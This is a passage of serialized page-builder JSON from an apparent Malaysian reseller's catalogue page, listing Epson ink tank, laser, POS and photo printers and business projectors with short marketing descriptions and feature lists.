width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"41\",\"right\":\"41\",\"bottom\":\"41\",\"left\":\"41\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi 